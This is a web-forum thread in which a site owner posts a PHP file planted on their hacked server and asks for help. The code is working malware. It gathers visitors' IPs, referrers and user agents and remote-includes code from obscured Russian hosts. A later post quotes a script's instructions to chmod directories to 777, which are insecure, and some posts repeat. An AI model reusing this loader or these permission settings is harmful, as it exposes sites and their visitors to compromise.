I'm having trouble with a couple of sites. My host says I have security holes and that I'm probably being hacked. I did some researching on my files and directories and found several newly added files. Just one day old in fact. Here's the content of one of them. I'm not a coder myself and don't understand what this code is:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base
64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

can be :)
it includes (or at least try to include) some code from http : / / user7 . htmltags . ru /?allinfoaboutyourwebvisitorhere

and i belive u have nothing common with that russian site :)

Thank you for your responce. It was clearly a hacking thing. I've cleaned up all suspicious files and restored a clean backup. One site is working fine and I'm fixing the second one. Hope they don't strike again just when I'm done :)
I don't what they are looking for. I don't have anything of value in there.

Thank you for your responce. It was clearly a hacking thing. I've cleaned up all suspicious files and restored a clean backup. One site is working fine and I'm fixing the second one. Hope they don't strike again just when I'm done :)
I don't what they are looking for. I don't have anything of value in there.

hehe they certainly do not look for anything u have but for your visitors :)
i can bet it includes some code that infects visitors pc

hehe they certainly do not look for anything u have but for your visitors :)
i can bet it includes some code that infects visitors pcI really hope not.
Furthermore, When I first discovered this, I did contact support. All they've been telling me is that I had several files/dirs chmoded to 777 and told me never to do that again. I'm wondering if this is true. I have a script that requires some dirs to have 777. Rename config.php.txt to config.php and chmod it to 666. Chmod your /attachments/ and /languages/ directories to 777. You may want to chmod your templates to 666 so that you can edit them through the online editor. Other items you may wish to chmod: searchlog.txt to 666, /admin/ to 777. Note: directory chmoding is server-specific, some servers may need 755 instead of 777. Warning: Never chmod a directory to 666. As you can see, the script author is saying "never chmod a directory to 666" and is asking to chmod some dirs to 777. The support guys are telling me never to chmod dirs or files to 777.
Now I'm really confused. Who's right here? what should I do?

What software are you using on those sites that were hacked?

Are you using open source scripts like phpBB, postnuke etc.? If yes, make sure you are on their mailing lists and whenever a new security announcement goes out just follow the instructions to patch your sites immediately.